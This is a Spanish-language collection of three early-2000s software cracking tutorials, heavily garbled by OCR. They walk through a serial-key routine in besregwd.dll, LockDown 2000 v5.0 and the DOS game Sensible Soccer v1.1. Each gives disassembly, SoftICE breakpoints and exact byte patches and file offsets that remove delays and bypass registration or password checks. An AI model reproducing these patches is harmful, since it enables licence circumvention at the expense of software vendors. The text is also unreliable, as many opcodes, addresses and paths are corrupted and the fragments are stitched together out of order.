:10001ED6, :10001EEF, 
8g8AC3 mov al, 
5E pop esi 
5B pop ebx 
5D pop ebp 
C3 ret 


bl 


:10001EFD, 


:10001EA8, 
:10001F0B 


6 y 4 


8765, esperamos que como minimo lleguemos a la direccion :10001F0D 


con exito 


Arrancamos de nuevo y regresamos de la rutina ca11 10001E8F con la bandera a 1, o sea 
con el valor del acumulador igual a uno, a partir de este momento ( se supone que estamos en la 
direccion :10001F'57 ), la salida por error es : 100020B6 asi que evitaremos caer aqui, nos 
vamos hasta la direccion 


E838FFFFFF call 10001E8F 
83C41C add esp, 0000001C 
84C0 test al, al 
0F8454010000 je 
8D45AC lea eax, 
50 push eax 
E865190000 call 
83F805 cmp eax, 
59 pop ecx 
or8gc41010000 31 100020B6 

8D7405A8 lea esi, dword ptr [ebp+eax-58] 
8D45EC lea eax, dword ptr [ebp-14] 

56 push esi 

50 push eax 


100020B6 
dword ptr [ebp-54] 
100038D0 
00000005 


E85D180000 call 100037E0 


802600 and byte ptr [esil], 00 
807DAC2A cmp byte ptr [ebp-54], 2A 
59 pop ecx 

59 pop ecx 


7508 jne 10001F96 


donde, una vez efectuado el salto, empieza el verdadero analisis de nuestra KEY que de hecho 


es un tanto complicada, y aunque paresca mucho 'rollo', la voy a poner completa, ya que para 
eso estamos aqui, para aprender a analizar 


:10001F96 
:10001F99 
:10001F9B 
:10001F9C 
:10001F9F 
:10001FA0 


8D45F8 lea eax, dword ptr [ebp-08] 
G6A0A push 0000000A 

50 push eax 

8D45AC lea eax, dword ptr [ebp-54] 


50 push eax 
E847220000 call 100041EC 


veamos, la rutina : 100041EC analiza el primer digito ( nuestro caso es 12345-678909- 
8765 ), el resultado obtenido lo guarda en la localidad de memoria 0064EB5C= 00000001 


:10001FA5 
:10001FA8 
:10001FAB 
:10001FAD 
:10001FBO 
:10001FB4 
:10001FB7 
:10001FBA 
:10001FBD 
:10001FCO 
:10001FC2 
:10001FC3 
:10001FC6 
:10001FC7 


8B4D10 mov ecx, dword ptr 
83C40C add esp, 0000000C 
8901 mov dword ptr [ecx], eax 
8A45EC mov al, byte ptr [ebp-14] 
80650A00 and byte ptr [ebp+0A], 
884508 mov byte ptr [ebp+08], al 
8A45ED mov al, byte ptr [ebp-13] 
884509 mov byte ptr [ebp+09], al 
8D45F8 lea eax, dword ptr [ebp-08] 
6A10 push 00000010 

50 push eax 
8D4508 lea eax, 
50 push eax 
E83C240000 call 10004408 


[ebp+10] 


00 


dword ptr [ebp+08] 


la rutina :10004408 analiza el segundo y tercer digito ( nuestro caso es 12345-678909- 
8765 ), el resultado obtenido lo guarda en la localidad de memoria 0064EB73= 00000023 


:10001FCC 
:10001FCF 
:10001FD2 
:10001FD4 
:10001EFD7 
:10001FDA 
:10001FE0O 
:10001FE3 
:10001FE7 


8B4D14 mov ecx, dword ptr 
83C40C add esp, 0000000C 
8801 mov byte ptr lecx], 
8B45F8 mov eax, dword ptr 
803800 cmp byte ptr leax], 
0F85D6000000 jne 100020B6 
8A45bEE mov al, byte ptr [ebp-12] 
8065F600 and byte ptr [ebp-0A], 
8845F4 mov byte ptr [ebp-0C], al 


[ebp+14] 
al 


[ebp-08] 
00 


00 


:10001FEA 
:10001FED 
:10001FF0 
:10001FF'3 


8A45EF mov al, byte ptr [ebp-11] 
8845F5 mov byte ptr [ebp-0B], al 
8D45F8 lea eax, dword ptr [ebp-08] 
6A10 push 00000010 


:10001FF5 
:10001FF6 
:10001FF9 
:10001FFA 


50 push eax 


50 push eax 


8D45F4 lea eax, 


dword ptr 


[ebp-0C] 


E809240000 call 10004408 


la rutina :10004408 analiza el cuarto y quinto digito ( nuestro caso es 12345-678909- 


8765 ), el resultado obtenido lo guarda en 


la localidad de memoria 0064EB68 
nuestro par ) 

la localidad de memoria 0064EB66 
la localidad de memoria 0064EB72 
la localidad de memoria 0064EB67 


00000005 (esto es igual al segundo digito de 


00000001 (si el primer digito de nuestro par es 2 ) 
00000001 (si el primer digito de nuestro par es 4 ) 
00000001 (si el primer digito de nuestro par es 8 ) 


:10001FFF 8B4DF8 mov ecx, dword ptr [ebp-08] 
:10002002 83C40C add esp, 0000000C 

:10002005 803900 cmp byte ptr [ecx]l, 00 
:10002008 0F85A8000000 jne 100020B6 
:1000200E 8B7518 mov esi, dword ptr [ebp+18] 
:10002011 8AC8 mov cl, al 

:10002013 83E11F and ecx, 0000001F 

:10002016 8B7D1C mov edi, dword ptr [ebp+1C] 
:10002019 890E mov dword ptr [esil, ecx 
:1000201B 8AC8 mov cl, al 

:1000201D 80E120 and cl, 20 

:10002020 8B5D20 mov ebx, dword ptr [ebp+20] 
:10002023 80F920 cmp cl, 20 

:10002026 6A0A push 0000000A 

:10002028 0F94C1 sete cl 

:1000202B 880F mov byte ptr [edil], cl 
:1000202D 8AC8 mov cl, al 

:1000202F 80E140 and cl, 40 

:10002032 80F940 cmp cl, 40 

:10002035 0F94C1 sete cl 

:10002038 2480 and al, 80 

:1000203A 880B mov byte ptr l[ebx], cl 
:1000203C€ 8B4D24 mov ecx, dword ptr [ebp+24] 
:1000203F 3C80 cmp al, 80 

:10002041 0F94C0 sete al 

:10002044 8801 mov byte ptr lecx], al 
:10002046 8D45F8 lea eax, dword ptr [ebp-08] 
:10002049 50 push eax 

:1000204A 8D856CFFFFFF lea eax, dword ptr [ebp+FEFFFFFE6C] 
:10002050 50 push eax 

:10002051 E896210000 call 100041EC 


la rutina :100041EC analiza la segunda seccion ( nuestro caso es 12345-678909-8765 ), 
el resultado obtenido lo guarda en la localidad de memoria 0064EBFC 


0DOOA5BEFD este 


numero es el exadecimal del numero decimal 678909 


:10002056 8B4D0C mov ecx, dword ptr [ebp+0C] 
:10002059 83C40C add esp, 0000000C 

:1000205C€ 8901 mov dword ptr [ecx], eax 
:1000205E 8B45F8 mov eax, dword ptr [ebp-08] 
:10002061 803800 cmp byte ptr [eax]l, 00 
:10002064 7550 jne 100020B6 

:10002066 8D45F8 lea eax, dword ptr [ebp-08] 
:10002069 6A10 push 00000010 

:1000206B 50 push eax 

:1000206C€ 8D852CFFFFFF lea eax, dword ptr [ebp+FEFEFFFF2C] 
:10002072 50 push eax 

:10002073 E890230000 call 10004408 


la rutina :100041EC analiza la tercer seccion ( nuestro caso es 12345-678909-8765 ), el 
resultado obtenido lo guarda en la localidad de memoria 0064EA30 00008765 


:10002078 
:1000207B 


894518 
8B45F8 


mov dword ptr [ebp+18], eax 
mov eax, dword ptr [ebp-08] 


:1000207E 
:10002081 
:10002084 


83C40C add esp, 


0000000€ 


803800 cmp byte ptr leax], 
7530 jne 100020B6 


00 


hasta aqui, la entrega se ha hecho sin error, ahora hay que ver que condiciones deben cumplir 
cada resultado obtenido, eso se desarrolla en la rutina siguiente 


:10002086 
:10002089 
:1000208B 
:1000208C 
:1000208E 
:1000208EF 
:10002091 
:10002092 
:10002095 
:10002097 
:10002099 
:1000209A 
:1000209D 
:1000209F 
:100020A2 
:100020A4 
:100020A9 
:100020AC 
:100020AF 


8B4524 mov eax, dword ptr 
8A00 mov al, byte ptr 
50 push eax 
8A03 mov al, 
50 push eax 
g8A07 mov al, 
50 push eax 
8B4514 mov eax, dword ptr 
FF36 push dword ptr [esi] 
8A00 mov al, byte ptr 
50 push eax 
8B4510 mov eax, 
FF30 push dword 
8B450C mov eax, 
FF30 push dword ptr [eax] 
E884FDFFFF call 10001E2D 
OFB7CO movzx eax, ax 
83C41C add esp, 0000001C 
394518 cmp dword ptr [ebp+ 


byte ptr 


byte ptr 


dword ptr 
ptr [eax] 
dword ptr 


[eax] 


[ebx] 


[edi] 


[eax] 


[ebp+24] 


[ebp+14] 


[ebp+10] 


[ebp+0C] 


18], eax 


:100020B2 0F9445FF sete byte ptr [ebp-01] 
:100020B6 8A45FF mov al, byte ptr [ebp-01] 
:100020B9 5F pop edi 

:100020BA 5E pop esi 

:100020BB 5B pop ebx 

:100020BC C9 leave 

:100020BD C3 ret 


En la rutina : 10001E2D se juega un poco con los siguientes datos mediante 'algoritmos' un 


tanto inutiles 


0167:0064E7D4 FD 5B 0A 00 02 A42 F5 FF-01 00 00 00 FE FF FF FF 
0167:0064E7E4 23 00 00 00 05 00 00 00-00 00 00 00 01 00 00 00 
0167:0064E7F4 00 00 00 00 7C E9 64 00-A9 20 00 10 FD 5B 0A 00 
0167:0064E804 01 00 00 00 00 EB 64 00-05 00 00 00 00 EB 64 00 


para asi poder obtener un numero 'magico' el cual es comparado con la tercer seccion de 
nuestra KE Y, de esta forma vamos a obtener el numero de serie correcto, en mi caso tendria que 
cambiar 8765 por A207, para que la aplicacion no rechace el KEY, si pones un BPX en 
100020AF y checas el numero en [ebp+18] , veras la tercer seccion de tu KEY, y en el 
acumulador puedes obtener la tercer seccion correcta. 


Hasta aqui ya podemos asegurar el triunfo, salvo un pequeño detalle que mencionare mas 
adelante, asi que vamos a concluir: la aplicacion sera registrada en dos pasos: 


PRIMER PASO - Cambios en codigo muerto 


Vamos a tener que efectuar ciertos cambios en el codigo de la aplicacion ( en realidad, los 
cambios deben ser efectuados en la libreria de la aplicacion besregwd.d11 ), en algunos 


lugares estrategicos mediante algun editor hexagesimal 


El primer cambio sera efectuado aqui 


:1000228A 8B4D0C mov ecx, dword ptr [ebp+0C] 
:1000228D 384DFF cmp byte ptr [ebp-01], cl 
:10002290 0F857F010000 jne 10002415 


| 
cambiarlo por 


:1000228A 8B4DFF mov ecx, dword ptr [ebp-01] 
:1000228D 384DFF cmp byte ptr [ebp-01], cl 
:10002290 0F857F010000 3jne 10002415 


no hay necesidad de explicarlo. 


Este es el siguiente cambio 


:100022B8 84C0 test al, al 
:100022BA 7515 jne 100022D1 


| 
cambiarlo por 


:100022B8 3AC0 cmp al, al 
:100022BA 7515 jne 100022D1 


este cambio tampoco hay porque explicarlo, a primera vista se ve porque hay que realizarlo. 


El ultimo cambio en el codigo es el siguiente 


:10002330 7470 Je 100023A2 


| 
habra que cambiarlo por 


:10002330 EB70 jmp 100023A2 


| 
tambien es logico el porque 


Como pueden observar los cambio efectuados son para impedir que la aplicacion 
nos saque del camino correcto y termine con un letrerito 'Error en la Key...' o con 
este otro 'La aplicacion ha sido desbloqueada...' y al fin de cuentas no nos registre 


SEGUNDO PASO - Cambios en caliente 


Vamos a tener que correr la aplicacion con el Softlce y hacer dos interrupciones en algunos 
lugares estrategicos, el primero ya lo mencionamos y sera para conocer la tercer seccion de 
nuestra KEY 


Coloca un BPX en 100020AF y checas el numero en EAX, dejas correr la aplicacion hasta que 
termine, corriges tu KEY y corres nuevamente la aplicacion, pero ahora con una interrupcion 
BPX 10001C75, aqui vamos a observar la localidad de memoria [EBP+0C] y le 
vamos a cambiar su valor a uno ( 0x01h ) 


:10001C75 55 push ebp 
:10001C76 8BEC mov ebp, esp 
:10001C78 53 push ebx 
:10001C79 FF7514 push [ebp+14] 
:10001C7C FF7510 push [ebp+10] 
:10001C7F FF750C push [ebp+0C] 
:10001C82 FF7508 push [ebp+08] 
:10001C85 E81B000000 call 10001CA5 
:10001C8A FF7514 push [ebp+14] 
:10001C8D 8AD8 mov bl, al 
:10001C8F FF7510 push [ebp+10] 


de esta forma todo marchara bien y podremos asegurar que le quitamos los BUGS 
a esta aplicacion 
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Programa: LockDown 2000 v5.0 


PROTECCION: Periodo de scada limitado a 10 dias y 
retardo al inicio 
, - Escudo de proteccion en internet contra intrusos 
Descripcion: Eds 
no invitados 
Dificultad: Novato. 
DOWNLOAD : http: //LockDown.com/secure.html 


GetTyp v2.60, ProcDump32 v1.6.2, Softice v4.0, 
W32dasm98, HexPert v3.0.05 


CRACKER: FECHA: 05/07/2001 
Fantomas 


Herramientas: 


INTRODUCCION 


Este analisis esta basado en el tutorial que presento Gohan para el LockDown v7.0, tal 
vez no haya mucho que aprender, pero para aquellos como yo, que no tengan la version 
7.0 y si a 5.0, y quieran practicar (que es la base del aprendisaje), he aqui otra version, 
que a pesar de ser ligeramente diferente a la v7.0 el mecanismo utilizado por Gohan es 
aplicable 


Gracias Gohan. 


AL ATAKE 


Ante la imposibilidad de cargar la aplicacion con W432dasm98, supondremos que posiblemente se 
encuentre empacada y antes de empezar a destripar la aplicacion, vamos a analizarla con el 
GetTyp 2.60 y Obtenemos lo siguiente 


= --- $ GetTyp 2.60 + $ Copyright (c) 1997-99 by PHaX $ --- 
= === $ phaxQwriteme.com + + http://surf.to/phax + --- 
$ free edition $ --- 


- [LockDown2000.exe] ----- 
DOS executable file -— 622592 bytes 


Portable executable (starting at 256 for 622336 bytes) 
Packer: PKLite32 1.1 

Calculated entrypoint: 80384 / 00013A00h (RVA: 001E4000h) 
Required CPU type: 80386 

Requires any version of Win32 

File is executable 

Line numbers stripped from file 

Local symbols stripped from file 

32 bit word machine 

Linker version: 2.25 

Objects (object align = 00001000h): 


etc, etc, etc. 


Ahora utilizaremos ProcDump32 para poder desempacarlo y una vez hecho esto, ahora si vamonos con el 
W32dasm98 


Lo primero que haremos, sera quitar esa rutina de retardo que se aplica al inicio, asi que buscaremos alguna cadena 
de texto que contenga la palabra Sleep y encontramos varios e inclusive encontramos un SleepEx, esto va a 


dificultar un poco la tarea 


Vamos entonces con el Softice y ponemos dos interrupciones bpex Sleep ybpx SleepEx, de esta 
forma cazaremos la primer rutina de retardo con Sleep, y lo que estabamos esperando aparece en la direccion 
:004C73F6 veamos 


:004C73E3 8BF0O mov esi, eax 
:004C73E5 EB14 jmp 004C73FB 


* Referenced by a Conditional Jump at Address :004C7402 
| 

:004C73E7 6A00 push 00000000 

:004C73E9 E826DFFEFF call 004B5314 

:004C73EE 8BF0O mov esi, eax 

:004C73F0 47 inc edi 

:004C73F1 68E8030000 push 000003E8 


* Reference To: KERNEL32.Sleep, Ord:0000h 


:004C73F6 E835FBF3FF Call 00406F30 


* Referenced by a Unconditional Jump at Address :004C73E5 


:004C73FB 85F6 test esi, esi 
:004C73FD 7D05 jge 004C7404 
:004C73FF 83FFOA cmp edi, 0000000A 
:004C7402 7CE3 31 004C73E7 


* Referenced by a Conditional Jump at Address :004C73FD 


:004C7404 85F6 test esi, esi 
:004C7406 7C36 31 004C743E 


y para evitar esta rutina vamos a saltarla desde :004C73E5 hasta :004C7404 mediante el siguiente cambio: 
:004C73E5 JMP 004C73FB cambiaa :004C73E5 JMP 004C7404 
asi que en el OffSet 000C69E5 pondremos EB 1D 


Bueno ahora si podemos correr la aplicacion varias veces mientras hacemos pruebas, sin que nos esten demorando. 


Ahora cargamos la aplicacion con el W32dasm98 nos vamos al menu Re fs, y despues al submenu String 
Data References, buscamos la cadena de texto LD2KReg. ini y le damos dos veces con el mouse, 
inmediatamente nos manda a la direccion 


* Possible StringData Ref from Code Obj ->"LD2KReg.ini" 
| 

:004A45FF B97C464A00 mov ecx, 004A467C 

:004A4604 B201 mov dl, 01 

:004A4606 A1FC9B4700 mov eax, dword ptr [00479BFC] 
:004A460B E89456FDFF call 00479CA4 

:004A4610 8BD8 mov ebx, eax 

:004A4612 6A00 push 00000000 

:004A4614 8D45FC lea eax, dword ptr [ebp-04] 

:004A4617 50 push eax 


* Possible StringData Ref from Code Obj ->"Register" 
:004A4618 B990464A00 mov ecx, 004A4690 


* Possible StringData Ref from Code Obj ->"Register" 


:004A461D BA90464A00 mov edx, 004A4690 
:004A4622 8BC3 mov eax, ebx 

:004A4624 8B30 mov esi, dword ptr [eax] 
:004A4626 FF16 call dword ptr [esi] 
:004A4628 8BC3 mov eax, ebx 

:004A462A ESEDE9F5FF call 0040301C 

:004A462F 8D45F8 lea eax, dword ptr [ebp-08] 
:004A4632 ESF9F9FFFF call 00444030 

:004A4637 8B55F8 mov edx, dword ptr [ebp-08] 
:004A463A 8B45FC mov eax, dword ptr [ebp-04] 
:004A463D E816FAF5FF call 00404058 

:004A4642 7504 jne 00444648 

:004A4644 B301 mov bl, 01 

:004A4646 EBO2 jmp 004A464A 


* Referenced by a Conditional Jump at Address :004A4642 


:004A4648 33DB xor ebx, ebx 


* Referenced by a Unconditional Jump at Address :004A4646 


:004A464A 33C0 xor eax, eax 

:004A464C 5A pop edx 

:004A464D 59 pop ecx 

:004A464E 59 pop ecx 

:004A464F 648910 mov dword ptr fs: [eax], edx 
:004A4652 686C464A00 push 004A466C 


* Referenced by a Unconditional Jump at Address :004A466A 


:004A4657 8D45F8 lea eax, dword ptr [ebp-08] 
:004A465A BA02000000 mov edx, 00000002 
:004A465F E870F6F5FF call 00403CD4 

:004A4664 C3 ret 


observen que antes de salir de esta rutina, existe un salto condicional que modifica algunos parametros, este salto 
se encuentra en la direccion :004A4642, la diferencia entre saltar o no saltar es que en el primer caso el registro 


EBX se iguala a cero en el otro caso se iguala a uno, esta es la bendera que se utiliza para validar el registro de la 
aplicacion, asi que cambiaremos 


:004a4642 75 04 por :004a4642 75 00 


y todo arreglado 


*La amenaza elegante* 


El presente documento, es una tarea cientifica de investigacion, con caracter docente, 


no pretende violar ninguna ley vigente, el autor no se hace responsable del uso, 
manejo o practicas inadecuadas del analisis presentado ([:0) 
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CRACKER: Saccopharynx FECHA: 02/10/2001 


INTRODUCCION 


Hola a todos: Este es mi primer tutorial de cracking y estoy seguro que 
no el último. Es por eso que quiero agradecer a: Karpoff, por tanta 
dedicación a este sitio; Dek_Oin y Black Fenix, por sus excelentes 
tutoriales; Pr(fFeSoR X, por el gran trabajo realizado con sus 
compilaciones, y también al resto de los crackers que aportan material al 
sitio. A ti, quién estás leyendo esto, como yo he leído por ahí, te digo: 


"escribe tutoriales para que el conocimiento no se pudra en tu cabeza". 
La información es PODER. De nosotros depende que todo esto sea posible. 
Basta de chachara y... 


| AL ATAKE 


INTRO 


Bueno después de leer y practicar en base a varios tutoriales, decidí hacer algo 
por cuenta propia. Pero mi primer tutorial debería ser algo especial, por lo 
menos para mi, ya que no me conformaría con un simple cracking igual a 
cualquiera que haya leído, porqué sino demostraría que no he aprendido nada y 
que me estoy copiando. A la vez debería seleccionar una victima acorde a mi 
nivel, que por ahora esta lejos del de un experto. Entonces como dice arriba la 
víctma fue el Sensible Soccer v 1.1. 


PRESENTANDO A LA VICTIMA 


Es un viejo juego para DOS del año 1993. No es gran cosa pero le tengo un cariño 
especial. Por error una vez lo borré del disco rígido Junto con el crack, y 
luego no lo conseguí por ningún lugar. Un día se me ocurrió buscarlo en internet 
y conseguí el juego en el sitio arriba mencionado. Pero había un problema, el 
juego lo conseguí, pero no los passwords para ingresar a él ni el crack. 
Entonces que mejor que crackearlo yo para ir tomando experiencia. En un 
principio parecía una víctima fácil, pero no fue así. Sigan leyendo y verán 
porqué. 


MANOS A LA OBRA 


Básicamente se me presentaron 2 problemas antes de poder crackearlo: 


1) El empaquetado: 


Abrí el soc.exe (ejecutable del juego) con el W32dasm, y como se trata de un 
juego de DOS, en lugar de las APIs de las DLLs, utiliza interrupciones. La 
interrupción típica para salir nuevamente al DOS es la 21, servicio 4c. Por lo 
tanto en el código debería econtrar las líneas: 


mov ah, 4c 
int 21 


Pero no fue así. En ningún lugar del código existían estas líneas. Entonces ¿qué 
estaba pasando?. Ataqué por otro lado: Con el viejo y querido Norton Comander de 
DOS apreté F3 para ver si encontraba alguna pista en soc.exe. Y así fue. Cerca 
del encabezado de este ejecutable se puede leer pklite y pkware. Pkware es al 
empresa que desarrolló el famoso pkzip, pero hasta entonces desconocía que era 
el pklite. 


Busqué en internet y descubrí que pklite es un compresor de EXEs que a 
diferencia del pkzip y del winzip comprime los ejecutables pero estos se pueden 
seguir ejecutando, reduciendo enórmemente su tamaño. Existen dos versiones de 
pklite, una para DOS y otra para Windows. Se pueden descargar de: 


www .pkware.com 


ftp.pkware.com 


Para este caso necesitamos la de DOS. Usamos el mismo pklite para descomprimir 
al archivo soc.exe y vemos que su tamaño se incrementó Casi en un 300%. Ahora 
si, volvemos a abrir el soc.exe (ya descomprimido) con el W32dasm y buscamos 


donde se utiliza la interrupción 21, servicio 4c. Y siiiiiiiiii. Encontramos que 
se está usando en 3 lugares. 


A esta altura se preguntarán porqué buscar por la interrupción 21, función 4c. 
Es simple: Cuando ingresamos mal el password 3 veces, salimos al DOS, entonces, 
mi intención es investigar el código cercano a estas líneas (las dos de arriba), 
en Cada uno de los tres lugares en donde aparecen, para encontrar algún salto 
sospechoso y Cambiarlo para evitar salir al DOS. Bueno, no pierdan tiempo los 
saltos sospechosos no están cerca de estas interrupciones. Debemos descubrir 
estos saltos de una forma más fácil. Luego veremos como. Programa desempacado, 
primer problema resuelto. 


2) La memoria convencional: 


La mejor forma de poder descubrir donde están los saltos que debemos parchear 
para burlar el ingreso del password es usando el SoftICE. Para eso debemos 
correr el Sensible Soccer desde Windows. El problema de este juego es que 
requiere mucha memoria convencional libre (aproximadamente 590 Kb.). Cuando 
abría una ventana de DOS desde Windows y ejecutaba mem /c/p no podía lograr 
tener más de 550 Kb. Tenía bien configurado el config.sys y el autoexec.bat, 
pero no podía saber que pasaba. De esta forma no podía debuggear el juego porque 
cuando ejecutaba soc.exe desde la ventana de DOS al no tener 590 Kb. de memoria, 
el juego volvía al DOS si poder ejecutarlo. Entonces mis alternativas eran las 
siguientes: 


A) Bootear con un diskette de arranque y debuggear el juego con un debugger de 
DOS. 


B) Intentar de alguna manera tener más de 590 Kb. 


A) Los debuggers de DOS me parecieron todos muy malos comparados con el SoftICE. 
Con ninguno pude lograr debuggear el juego. Ni siquiera con el SoftICE de DOS 
versión 2.80, porque el patch para procesadores PENTIUM no me fucionó. Resignado 
tuve que optar por la opción B, sio si. 


B) Investigué nuevamente que pasaba. Cuando ejecutaba mem /c/p noté que el 
himem.sys ocupaba en la memoria 46 preciosos Kbs., los cuales me venian 
bárbaros. Pero lo más sorprendete es que el tamaño del himem.sys es de 33 Kb. 
(en disco). Entoncés ¿Por qué ocupaca más en memoria? Busqué en internet hasta 
llegar a una página de Microsoft, en la cual me enteré que esto que me pasaba 
era un BUG de Windows 95 OSR2 (versión Spanish y otras más). 


Según esta página de Microsoft la versión en inglés no presenta el problema. 
Afortunadamente había un patch para bajar. Lo bajé, lo corrí, reinicie, y logré 
tener por primera vez en la historia de mi computadora, 610 Kb. libres de 
memoria convencional DESDE DE WINDOWS. Este patch actualiza el IO.SYS (para 
poder acceder a memoria alta en MS-DOS). Con este patch instalado el himem.sys 
solo ocupa 1 Kb. en memoria. Si alguién tiene problemas de memoria aquí les dejo 
mi autoexec.bat, config.sys y el link de donde bajar el patch para solucionar el 
problema del himem.sys. 


Mi Autoexec.bat: 


path=c:1borlandcYbin;¿c:Anc;c:Ainu;¿c:iwindowslcommand;c:XtcYbin; 


mode con codepage prepare=((850) C:1WINDOWSXCOMMAND ega.cpi) 
mode con codepage select=850 

PROMPT $p$g 

Qecho off 

C:AWINDOWSXCOMMANDYCHOICE CARGO EL SOFT-ICE /t:n,5 

if errorlevel 2 goto SEGUIR 

e: ASOFTICENWINICE.EXE 

: SEGUIR 


Mi Config.sys: 


device=c:Xwindowslhimem.sys 
devicehigh=c:windowslemm386.exe noems I=e000-efff 
dos=high,umb 
devicehigh=c:1windowslXcommandlYdrvspace.sys /move 
devicehigh=C:AWINDOWSXCOMMANDAdisplay.sys con=(ega, ,1) 
Country=054,850,C:AWINDOWSXCOMMANDA country .sys 


Link del patch: 


http: //support .microsoft .com/support/kb/articles/q170/4/56.asp 
(De aquí deberán bajar el archivo lIosysspa.exe si tienen la 
versión en español de Windows 95). 


Algunas versiones de Windows 98 presentan el mismo problema. Antes de instalar 
el patch asegurarase de que el himem.sys ocupa más de 1 Kb. en memoria. Problema 
resuelto. 


Ahora por fin al cracking. Cómo dije antes, tenemos que averiguar donde están 
los saltos que debemos parchear para burlar el ingreso del password. Bien: 


1) Abrimos una ventana de DOS y vamos al directorio donde instalamos el juego, y 
lo ejecutamos tipeando soc.exe seguido de enter. 


2) Cuando llegamos a la pantalla de ingreso del password, tipeamos cualquier 
password y antes de dar enter presionamos CTRL+D para ir al SoftICE. Aparecemos 
cerca de las direcciones de memoria: 


31£f1:0401 ec IN AL, DX 

3ff1:0402 2408 AND AL,08 

3f£f1:0404 74fb JZ 0401 

3ff1:0457 C706255F000A MOV WORD PTR [5F25], 0A00 (*) 


Quiero aclarar que estas direcciones no se corresponden directamente con las de 

W32Dasm. No son las mismas. No se porqué. Si alguien lo sabe por favor dígamelo. 
Por lo tanto para localizarlas en W32Dasm, y poder estudiar el código, busqué la 
Cadena: MOV WORD PTR [5F25], 0A00 


La cuarta aparición de esta cadena es la misma de la dirección 3ff1:0457. Como 
se observa, las direcciones de memoria no se ven iguales en SoftICE y W32Dasm: 


:0004.6127 C706255F00DA mov word ptr [5F25], 0400 


SoftICE: 3ff1:0457 
W32Dasm: 0004.6127 


Ya localizamos el código en el “W32Dasm. Ahora vamos a analizarlo. También 
podemos analizarlo en Softice, pero nos conviene en W32Dasm para obtener los 
OFFSETS donde aplicaremos los parches de forma más rápida. Un poco más abajo 
podemos ver el siguiente código: 


:0004.616B £323E00000D cmp word ptr [0000] 


En la línea 0004.616B hay una comparación contra el caracter D en hexa. D en 
hexa es 13, y el 13 en ascii es el ENTER. Esto quiere decir que cuando damos 
enter en la pantalla del password se produce un salto a la dirección 61AE: 


0004.6170 743c je 61AE 


Vamos hasta esta dirección y vemos: 


* Referenced by a (U)jnconditional or (C)onditional Jump at Address: 


1:0004.6170(C) 

| 

:0004.61B1 SEDS mov ds, ax 

:0004.61B3 C?06206SFEFF mov word ptr [6820], FFFE 
:0004.61B9 SBOE3BSF mow cx, [5F3B] 

:0004.61BD 0BC9 DE CX, ER 

:0004.61BF 7503 jne 6104 

:0004.61C1 ESEAFE jmp S5DAE 


en la línea 0004.61BD hay un OR. Este OR compara que nuestro password no sea 
solo un enter (o sea tenga al menos 1 caracter o el largo sea mayor a cero). Si 
es solo un ENTER no comprueba si el password es válido o no, y asume que no lo 
es produciendo u salto a 0004.5DAE (nos hace ingresar el password otra vez). 
[Pero si ingresamos algo vemos que continua en 0004.61C4: 


* Referenced by a (U)inconditional or (Cjonditional Jump at Address: 
|:0004.61BF(C) 
| 


:0004.61C04 BEZ95F mov si, 5F29 
:0004.61C07? 800420 add byte ptr [si], 20 
:0004.61CA 46 inc si 

:0004.61CB E2FA loop 6107 

:0004.61CD Có60400 mov byte ptr [sil], 00 
:0004.61D0 S8E060424 mov es 2404 
:0004.61D7? SB3E3DSF mov di, [5F3D] 
:0004.61DB SBOE3BSF mov cx, [5F3B] 
:0004.61DF F3 repz 

:0004.61E0 26 cmpsb 

:0004.61E1l 7403 je 6lE6 

:0004.61E3 ESCSFEB jmp 5DAE 


* Referenced by a (U)inconditional or (Cjonditional Jump at Address: 


1:0004.61E1(C) 

| 

:0004.61E6 C?062068FDFF mov word ptr [6820], FFFD 
:0004.61EC CB ret f 


Entre la líneas 0004.61D4 y 0004.61E0 se compara nuestro password con el 
correcto. Si lo ingresamos mal saltamos al mismo lugar que si hubiésemos dado 
solo ENTER (Jjmp 5DAE) . Pero si el password es el correcto vemos que salta a: 
0004.61E6. Entonces debemos invertir este último salto. ¿Cómo? Es fácil. 


Primero debemos ubicar el OFFSET donde se produce el salto dentro del archivo. 
Para esto hacemos doble click sobre la línea 0004.61E1l. Veremos abajo de todo, 
en el W32Dasm, que este offset es: 


000361Elh 


Una vez que tenemos el offset debemos abrir soc.exe con un editor hexadecimal e 
ir a este offset. Yo use el HexWorkShop, pero cuando fui hasta el offset 
indicado (Edit->goto), descubrí que el código no era el mismo. No se porqué los 
ofísets no se corresponden de W32Dasm a HexWorkShop con este juego. Por lo tanto 
no recomiendo buscar por offset para crackear este juego. La mejor alternativa 
es buscar por código. El código es la segunda columna en el W32Dasm (la que está 


despues de las direcciones de memoria). Osea si queremos invertir el salto de la 
posición de memoria 0004.61E1l busquemos en el editor hexadecimal la cadena: 


7403E9C8FBC706 (Edit->Find->Hexa) 


Ahora si, lo único que nos falta es cambiar el 74 al principio de esta Cadena 
por un EB, para saltar siempre hacia adelante a la dirección :0004.61E6. Podemos 
cambiar 74 (je->salta si es igual) por 75 (jne->salta si no es igual) pero si 
algún día ingresamos el password correcto por casualidad, lo tomará como 
inválido. Pero al cambiar por EB (jmp->salto incondicional) siempre entrará. 
Luego de hacer estos cambios los guradamos y listo. 


Y para pulirlo más podemos modificar el salto para cuando le damos solamente 
enter sin ingresar el password. Aquí el cambio es un poco más complicado. El 
salto que hay que cambiar es el de la posición: 


0004.61BF 7503 jne 61C4 


Pero no solo debemos cambiar 75 por EB. También 03 por 25. ¿Por qué? Porque 03 
es la cantidad de bytes que el salto va hacer. Si solo salta 3 bytes hacia 
delante Ccaeremos justo en la rutina que compara los passwords, pero si damos 
solo un enter no habrá cedena para comparar contra el password y saben que 
sucede: Se cuelga el Windows y hay que reiniciar el equipo, porque esta rutina 
asume que la longitud de nuestro password es de al menos 1 caracter. Al poner 25 
saltamos 37 bytes hacia delante (37 decimal = 25 en hexa), y Caemos justo en el 
mismo lugar que en el salto anterior (después de la comparación de los 
passwords). En el editor hexa este salto esta una línea más arriba que el 
anterior. Igualmente si no se dan cuenta pueden hacer la búsqueda de código como 
hicimos en el salto anterior. 


Para Calcular que el desplazamiento es de 25 hacia delante debemos tener en 
cuenta que queremos saltar 


desde: 0004.61BF 
hasta: 0004.61E6 


Entonces tomamos una calculadora, la ponemos en modo hexadecimal y hacemos: 


61E6 — (61BF + 02) = 25 


El 02 es el tamaño que ocupa la instrucción de la dirección 0004.61BF, pero como 
la cantidad de bytes a saltar se comienza a contar a partir de la próxima 
instrucción, y no desde la que hace el salto, debemos incrementar 61BF en 02 
para que cuente a partir de 61C1, ya que la instrucción que comienza en 
0004.61BF ocupa 02 bytes. 


Guardar los cambios, comprimir el soc.exe para que ocupe menos espacio con el 
comando pklite soc.exe, y si quieren, se pueden generar un crack con algún 
